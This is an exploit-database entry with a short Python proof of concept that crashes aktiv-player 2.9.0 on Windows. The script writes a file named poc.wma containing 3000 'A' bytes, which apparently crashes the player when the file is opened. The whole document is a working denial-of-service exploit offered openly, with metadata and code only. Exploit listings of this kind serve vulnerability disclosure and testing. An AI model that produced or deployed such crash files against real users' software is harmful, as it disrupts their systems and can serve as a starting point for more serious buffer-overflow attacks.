aktiv-player 2.9.0 - Crash (PoC)

EDB-ID:

24812

CVE:



Author:

metacom

Type:

dos


Platform:

Windows

Date:

2013-03-15


# !/usr/bin/python
# Exploit Title: aktiv-player version 2.9.0 Crash PoC
# Exploit Author: metacom
# RST 
# Vendor Homepage: http://www.goforsharing.com/home-mainmenu-1/aktiv-player-mainmenu-131.html
# Tested on: Windows 7 German

filename = "poc.wma"

buffer = "\x41" * 3000
exploit = buffer 
 
textfile = open(filename , 'w')
textfile.write(exploit)
textfile.close()